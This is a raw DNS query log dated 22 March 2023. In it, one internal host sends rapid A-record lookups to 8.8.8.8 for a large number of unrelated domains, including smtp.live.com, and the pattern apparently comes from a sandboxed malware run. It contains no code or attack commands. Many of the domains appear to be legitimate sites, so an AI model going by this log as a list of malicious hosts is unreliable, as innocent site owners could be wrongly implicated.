Mar 22, 2023 05:45:06.534204960 CET	192.168.2.5	8.8.8.8	0xf527	Standard query (0)	mkm-gr.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.535926104 CET	192.168.2.5	8.8.8.8	0x3002	Standard query (0)	johnlyon.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.544783115 CET	192.168.2.5	8.8.8.8	0x7442	Standard query (0)	linac.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.547784090 CET	192.168.2.5	8.8.8.8	0x8e2c	Standard query (0)	www.diamir.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.614327908 CET	192.168.2.5	8.8.8.8	0x3aed	Standard query (0)	strazynski.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.615048885 CET	192.168.2.5	8.8.8.8	0x983a	Standard query (0)	pro-fa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.615048885 CET	192.168.2.5	8.8.8.8	0x856f	Standard query (0)	clinicasanluis.com.co	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.615286112 CET	192.168.2.5	8.8.8.8	0xac59	Standard query (0)	flamingorecordings.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.615286112 CET	192.168.2.5	8.8.8.8	0x2927	Standard query (0)	coxkitchensandbaths.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.626425982 CET	192.168.2.5	8.8.8.8	0x6cf4	Standard query (0)	bible.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.662473917 CET	192.168.2.5	8.8.8.8	0xa7ee	Standard query (0)	ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.716492891 CET	192.168.2.5	8.8.8.8	0xc524	Standard query (0)	zugseil.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.719897985 CET	192.168.2.5	8.8.8.8	0x8a13	Standard query (0)	ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.776232004 CET	192.168.2.5	8.8.8.8	0x3b8b	Standard query (0)	www.ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.786376953 CET	192.168.2.5	8.8.8.8	0x74d1	Standard query (0)	www.fnw.us	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.800900936 CET	192.168.2.5	8.8.8.8	0x16ab	Standard query (0)	kursavto.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.908047915 CET	192.168.2.5	8.8.8.8	0x2171	Standard query (0)	www.diamir.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.910552979 CET	192.168.2.5	8.8.8.8	0xffb5	Standard query (0)	mikihan.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.918348074 CET	192.168.2.5	8.8.8.8	0x2dd4	Standard query (0)	lpver.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.922883034 CET	192.168.2.5	8.8.8.8	0xb2c0	Standard query (0)	www.wkhk.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.923429966 CET	192.168.2.5	8.8.8.8	0xf60b	Standard query (0)	valselit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.927824974 CET	192.168.2.5	8.8.8.8	0x1c29	Standard query (0)	106west.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.933173895 CET	192.168.2.5	8.8.8.8	0xa400	Standard query (0)	hyab.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.934324980 CET	192.168.2.5	8.8.8.8	0x6ff2	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.935794115 CET	192.168.2.5	8.8.8.8	0x5bca	Standard query (0)	hyab.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.942118883 CET	192.168.2.5	8.8.8.8	0xcce1	Standard query (0)	ldh.la.gov	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.038450003 CET	192.168.2.5	8.8.8.8	0x9850	Standard query (0)	dataform.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.058737040 CET	192.168.2.5	8.8.8.8	0x1cfc	Standard query (0)	www.hyabmagneter.se	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.059298038 CET	192.168.2.5	8.8.8.8	0xa3d0	Standard query (0)	invictus.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.060041904 CET	192.168.2.5	8.8.8.8	0x6732	Standard query (0)	jsaps.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.060642958 CET	192.168.2.5	8.8.8.8	0xa538	Standard query (0)	envogen.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.125144005 CET	192.168.2.5	8.8.8.8	0x6393	Standard query (0)	bd-style.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.148793936 CET	192.168.2.5	8.8.8.8	0xc278	Standard query (0)	kairel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.197375059 CET	192.168.2.5	8.8.8.8	0xcd44	Standard query (0)	fundeo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.206351995 CET	192.168.2.5	8.8.8.8	0xa6c4	Standard query (0)	chzko.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.222798109 CET	192.168.2.5	8.8.8.8	0xcc83	Standard query (0)	cpmteam.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.240183115 CET	192.168.2.5	8.8.8.8	0x2b10	Standard query (0)	cbaben.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.314857960 CET	192.168.2.5	8.8.8.8	0x3945	Standard query (0)	karmy.com.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.352904081 CET	192.168.2.5	8.8.8.8	0x3072	Standard query (0)	multip.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.391314030 CET	192.168.2.5	8.8.8.8	0xe71	Standard query (0)	multip.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.393251896 CET	192.168.2.5	8.8.8.8	0xeced	Standard query (0)	kevyt.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.406604052 CET	192.168.2.5	8.8.8.8	0x9a07	Standard query (0)	cjborden.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.410073996 CET	192.168.2.5	8.8.8.8	0x70ee	Standard query (0)	hyabmagneter.se	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.418906927 CET	192.168.2.5	8.8.8.8	0x2f5c	Standard query (0)	multip.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.497565031 CET	192.168.2.5	8.8.8.8	0xf511	Standard query (0)	hyabmagneter.se	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.534579992 CET	192.168.2.5	8.8.8.8	0xc69d	Standard query (0)	www.jroy.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.561060905 CET	192.168.2.5	8.8.8.8	0x35a0	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.587143898 CET	192.168.2.5	8.8.8.8	0x5a5d	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.588346004 CET	192.168.2.5	8.8.8.8	0xf569	Standard query (0)	ciicsc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.589773893 CET	192.168.2.5	8.8.8.8	0x8029	Standard query (0)	ccrsi.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.593986988 CET	192.168.2.5	8.8.8.8	0x8fd5	Standard query (0)	softizer.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.612144947 CET	192.168.2.5	8.8.8.8	0x1deb	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.614118099 CET	192.168.2.5	8.8.8.8	0x5564	Standard query (0)	ciicsc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.633928061 CET	192.168.2.5	8.8.8.8	0x4da0	Standard query (0)	ie-roi.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.645076036 CET	192.168.2.5	8.8.8.8	0xa75a	Standard query (0)	ciicsc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.678980112 CET	192.168.2.5	8.8.8.8	0x434b	Standard query (0)	ie-roi.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.680803061 CET	192.168.2.5	8.8.8.8	0xc837	Standard query (0)	pellys.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.689290047 CET	192.168.2.5	8.8.8.8	0x3bdb	Standard query (0)	sanfotek.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.705765009 CET	192.168.2.5	8.8.8.8	0xe489	Standard query (0)	ie-roi.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.708767891 CET	192.168.2.5	8.8.8.8	0xcdd	Standard query (0)	www.owsports.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.714055061 CET	192.168.2.5	8.8.8.8	0x2f6d	Standard query (0)	www.reglera.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.714612961 CET	192.168.2.5	8.8.8.8	0xc561	Standard query (0)	hubbikes.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.761751890 CET	192.168.2.5	8.8.8.8	0xd625	Standard query (0)	www.ex-olive.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.761751890 CET	192.168.2.5	8.8.8.8	0x1d88	Standard query (0)	rtcasey.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.777929068 CET	192.168.2.5	8.8.8.8	0xab3	Standard query (0)	wanoa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.824671984 CET	192.168.2.5	8.8.8.8	0xb9fa	Standard query (0)	www.hyabmagneter.se	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.907393932 CET	192.168.2.5	8.8.8.8	0x6ff2	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.913604021 CET	192.168.2.5	8.8.8.8	0x7eda	Standard query (0)	juso-gr.ch	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.926261902 CET	192.168.2.5	8.8.8.8	0xbc65	Standard query (0)	fifa-ews.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.957593918 CET	192.168.2.5	8.8.8.8	0x1063	Standard query (0)	sanfotek.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.957719088 CET	192.168.2.5	8.8.8.8	0xe0a	Standard query (0)	tozzhin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.990483999 CET	192.168.2.5	8.8.8.8	0x6efd	Standard query (0)	angework.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.005542040 CET	192.168.2.5	8.8.8.8	0xe4f3	Standard query (0)	www.hyabmagneter.se	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.010488987 CET	192.168.2.5	8.8.8.8	0x7aef	Standard query (0)	grlawcc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.011038065 CET	192.168.2.5	8.8.8.8	0x4440	Standard query (0)	msl-lock.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.036367893 CET	192.168.2.5	8.8.8.8	0xf169	Standard query (0)	grlawcc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.036742926 CET	192.168.2.5	8.8.8.8	0x9cc3	Standard query (0)	eos-i.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.059046984 CET	192.168.2.5	8.8.8.8	0x1d26	Standard query (0)	kavram.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.059325933 CET	192.168.2.5	8.8.8.8	0x88c2	Standard query (0)	any-s.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.062381983 CET	192.168.2.5	8.8.8.8	0xecd1	Standard query (0)	grlawcc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.079566002 CET	192.168.2.5	8.8.8.8	0x61d7	Standard query (0)	lpver.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.156533003 CET	192.168.2.5	8.8.8.8	0xd101	Standard query (0)	dzm.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.197987080 CET	192.168.2.5	8.8.8.8	0x7284	Standard query (0)	www.udesign.biz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.326499939 CET	192.168.2.5	8.8.8.8	0xc10a	Standard query (0)	shesfit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.391144037 CET	192.168.2.5	8.8.8.8	0xd733	Standard query (0)	amic.at	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.423774958 CET	192.168.2.5	8.8.8.8	0xa013	Standard query (0)	www.yumgiskor.kz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.448796034 CET	192.168.2.5	8.8.8.8	0xbd20	Standard query (0)	www.medisa.info	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.453612089 CET	192.168.2.5	8.8.8.8	0xe84d	Standard query (0)	xsui.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.453783035 CET	192.168.2.5	8.8.8.8	0xe6b	Standard query (0)	canasil.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.482893944 CET	192.168.2.5	8.8.8.8	0xe362	Standard query (0)	amba-tc.si	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.565830946 CET	192.168.2.5	8.8.8.8	0xe5fe	Standard query (0)	amba-tc.si	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.600176096 CET	192.168.2.5	8.8.8.8	0x3a56	Standard query (0)	amba-tc.si	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.671833992 CET	192.168.2.5	8.8.8.8	0x8853	Standard query (0)	sokuwan.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.672316074 CET	192.168.2.5	8.8.8.8	0xd4d	Standard query (0)	kumaden.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.690546989 CET	192.168.2.5	8.8.8.8	0x5709	Standard query (0)	mikihan.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.772927999 CET	192.168.2.5	8.8.8.8	0x2f50	Standard query (0)	canasil.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.922785997 CET	192.168.2.5	8.8.8.8	0xc99b	Standard query (0)	yoruksut.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.924097061 CET	192.168.2.5	8.8.8.8	0xf0d5	Standard query (0)	noblesse.be	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:08.950527906 CET	192.168.2.5	8.8.8.8	0x6ff2	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.053587914 CET	192.168.2.5	8.8.8.8	0x481c	Standard query (0)	cnti.krsn.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.123155117 CET	192.168.2.5	8.8.8.8	0x6a5f	Standard query (0)	bossinst.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.180943966 CET	192.168.2.5	8.8.8.8	0x2529	Standard query (0)	www.koz1.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.189640045 CET	192.168.2.5	8.8.8.8	0xa0a0	Standard query (0)	cpmteam.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.217191935 CET	192.168.2.5	8.8.8.8	0x8413	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.222935915 CET	192.168.2.5	8.8.8.8	0x84a	Standard query (0)	johnlyon.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.237299919 CET	192.168.2.5	8.8.8.8	0x7a62	Standard query (0)	revoldia.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.242100000 CET	192.168.2.5	8.8.8.8	0xe5c	Standard query (0)	simetar.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.252707005 CET	192.168.2.5	8.8.8.8	0x2a79	Standard query (0)	cyclad.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.317755938 CET	192.168.2.5	8.8.8.8	0x9dab	Standard query (0)	wanoa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.357424974 CET	192.168.2.5	8.8.8.8	0x2528	Standard query (0)	tozzhin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.357875109 CET	192.168.2.5	8.8.8.8	0x161b	Standard query (0)	sledsport.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.373008966 CET	192.168.2.5	8.8.8.8	0x1660	Standard query (0)	h-et-l.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.378346920 CET	192.168.2.5	8.8.8.8	0x257b	Standard query (0)	www.usadig.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.380635023 CET	192.168.2.5	8.8.8.8	0x4464	Standard query (0)	ncn.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.396924973 CET	192.168.2.5	8.8.8.8	0xa330	Standard query (0)	hubbikes.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.459076881 CET	192.168.2.5	8.8.8.8	0x9897	Standard query (0)	hazmatt.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.521851063 CET	192.168.2.5	8.8.8.8	0x90e7	Standard query (0)	nettle.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.683721066 CET	192.168.2.5	8.8.8.8	0x4669	Standard query (0)	vivastay.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.695750952 CET	192.168.2.5	8.8.8.8	0x31f1	Standard query (0)	someikan.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.761790037 CET	192.168.2.5	8.8.8.8	0x2feb	Standard query (0)	wnit.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.763223886 CET	192.168.2.5	8.8.8.8	0xab23	Standard query (0)	ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.836039066 CET	192.168.2.5	8.8.8.8	0xf239	Standard query (0)	www.synetik.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.870784044 CET	192.168.2.5	8.8.8.8	0x8168	Standard query (0)	listel.co.jp	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.878637075 CET	192.168.2.5	8.8.8.8	0xaef3	Standard query (0)	ludea.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.905611038 CET	192.168.2.5	8.8.8.8	0x8366	Standard query (0)	ludea.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.961625099 CET	192.168.2.5	8.8.8.8	0x45fa	Standard query (0)	msl-lock.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:09.974176884 CET	192.168.2.5	8.8.8.8	0x38f9	Standard query (0)	ludea.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.030231953 CET	192.168.2.5	8.8.8.8	0x2a75	Standard query (0)	popbook.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.038053036 CET	192.168.2.5	8.8.8.8	0xc1d1	Standard query (0)	madjek.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.048943043 CET	192.168.2.5	8.8.8.8	0xe6b5	Standard query (0)	tabbles.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.159347057 CET	192.168.2.5	8.8.8.8	0x4706	Standard query (0)	webways.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.173607111 CET	192.168.2.5	8.8.8.8	0xe67f	Standard query (0)	vfcindia.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.263886929 CET	192.168.2.5	8.8.8.8	0xc629	Standard query (0)	x96.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.270824909 CET	192.168.2.5	8.8.8.8	0xdaa4	Standard query (0)	cvswl.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.275188923 CET	192.168.2.5	8.8.8.8	0xe5c	Standard query (0)	simetar.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.287925959 CET	192.168.2.5	8.8.8.8	0x244b	Standard query (0)	someikan.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.297656059 CET	192.168.2.5	8.8.8.8	0xf2a1	Standard query (0)	atbauk.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.306313992 CET	192.168.2.5	8.8.8.8	0x1b6a	Standard query (0)	madjek.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.329356909 CET	192.168.2.5	8.8.8.8	0xcead	Standard query (0)	amerifor.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.335464954 CET	192.168.2.5	8.8.8.8	0x2978	Standard query (0)	canasil.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.341332912 CET	192.168.2.5	8.8.8.8	0x774a	Standard query (0)	cvswl.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.857171059 CET	192.168.2.5	8.8.8.8	0x2feb	Standard query (0)	wnit.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.857487917 CET	192.168.2.5	8.8.8.8	0xab23	Standard query (0)	ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.897672892 CET	192.168.2.5	8.8.8.8	0x953c	Standard query (0)	cvswl.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.903970957 CET	192.168.2.5	8.8.8.8	0xa25b	Standard query (0)	someikan.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.906857014 CET	192.168.2.5	8.8.8.8	0x54cf	Standard query (0)	madjek.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.909409046 CET	192.168.2.5	8.8.8.8	0xe7ea	Standard query (0)	canmore.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.920298100 CET	192.168.2.5	8.8.8.8	0x753	Standard query (0)	pcoyuncu.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.928873062 CET	192.168.2.5	8.8.8.8	0xf926	Standard query (0)	isom.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.936616898 CET	192.168.2.5	8.8.8.8	0x3fa	Standard query (0)	ifesnet.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.938358068 CET	192.168.2.5	8.8.8.8	0x7211	Standard query (0)	polprime.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.938358068 CET	192.168.2.5	8.8.8.8	0x1fc8	Standard query (0)	ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.940398932 CET	192.168.2.5	8.8.8.8	0xa0ce	Standard query (0)	gcss.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.961982965 CET	192.168.2.5	8.8.8.8	0xe78a	Standard query (0)	h-et-l.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.969415903 CET	192.168.2.5	8.8.8.8	0xd6f	Standard query (0)	bible.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.973052025 CET	192.168.2.5	8.8.8.8	0x1019	Standard query (0)	canmore.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.985577106 CET	192.168.2.5	8.8.8.8	0xc25b	Standard query (0)	samtv.ro	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.988024950 CET	192.168.2.5	8.8.8.8	0x4d6c	Standard query (0)	wanoa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.990477085 CET	192.168.2.5	8.8.8.8	0xb1db	Standard query (0)	ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:10.994590044 CET	192.168.2.5	8.8.8.8	0x2185	Standard query (0)	h-et-l.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:11.015851021 CET	192.168.2.5	8.8.8.8	0x6ff2	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:11.018907070 CET	192.168.2.5	8.8.8.8	0x7f4d	Standard query (0)	canmore.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:11.023530006 CET	192.168.2.5	8.8.8.8	0x4dd9	Standard query (0)	samtv.ro	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:11.038392067 CET	192.168.2.5	8.8.8.8	0x2f3e	Standard query (0)	h-et-l.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:11.038393021 CET	192.168.2.5	8.8.8.8	0xf7f2	Standard query (0)	kavram.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:11.059370041 CET	192.168.2.5	8.8.8.8	0xba8	Standard query (0)	samtv.ro	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:11.108463049 CET	192.168.2.5	8.8.8.8	0x26bc	Standard query (0)	htsmx.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:11.272381067 CET	192.168.2.5	8.8.8.8	0x4032	Standard query (0)	okashimo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:11.280913115 CET	192.168.2.5	8.8.8.8	0x7d2e	Standard query (0)	workplus.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:11.432620049 CET	192.168.2.5	8.8.8.8	0x26e6	Standard query (0)	pro-fa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.437804937 CET	192.168.2.5	8.8.8.8	0x4f4	Standard query (0)	ie-roi.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.441209078 CET	192.168.2.5	8.8.8.8	0xa91e	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.446079016 CET	192.168.2.5	8.8.8.8	0xd135	Standard query (0)	smtp.live.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.450999975 CET	192.168.2.5	8.8.8.8	0x9970	Standard query (0)	web-york.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.467351913 CET	192.168.2.5	8.8.8.8	0xd8e5	Standard query (0)	ikulani.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.532002926 CET	192.168.2.5	8.8.8.8	0x26e6	Standard query (0)	pro-fa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.645339012 CET	192.168.2.5	8.8.8.8	0x5907	Standard query (0)	yasuma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.744935036 CET	192.168.2.5	8.8.8.8	0xaf6	Standard query (0)	e-asset.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.753216028 CET	192.168.2.5	8.8.8.8	0xc2ec	Standard query (0)	fdlymca.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.762128115 CET	192.168.2.5	8.8.8.8	0x6e5	Standard query (0)	kamptal.at	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.763314009 CET	192.168.2.5	8.8.8.8	0xdb13	Standard query (0)	fifa-ews.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.782043934 CET	192.168.2.5	8.8.8.8	0x88ed	Standard query (0)	jsaps.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.818067074 CET	192.168.2.5	8.8.8.8	0xc597	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.822753906 CET	192.168.2.5	8.8.8.8	0x73fc	Standard query (0)	e-kami.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.826973915 CET	192.168.2.5	8.8.8.8	0xff9d	Standard query (0)	atis-sk.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.846102953 CET	192.168.2.5	8.8.8.8	0x7578	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.863964081 CET	192.168.2.5	8.8.8.8	0xa2f3	Standard query (0)	ludomemo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.878081083 CET	192.168.2.5	8.8.8.8	0xbda9	Standard query (0)	doggybag.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.889604092 CET	192.168.2.5	8.8.8.8	0x93cb	Standard query (0)	cubodown.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.894344091 CET	192.168.2.5	8.8.8.8	0xd174	Standard query (0)	notis.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:12.897919893 CET	192.168.2.5	8.8.8.8	0xbd07	Standard query (0)	rokoron.com	A (IP address)	IN (0x0001)	false
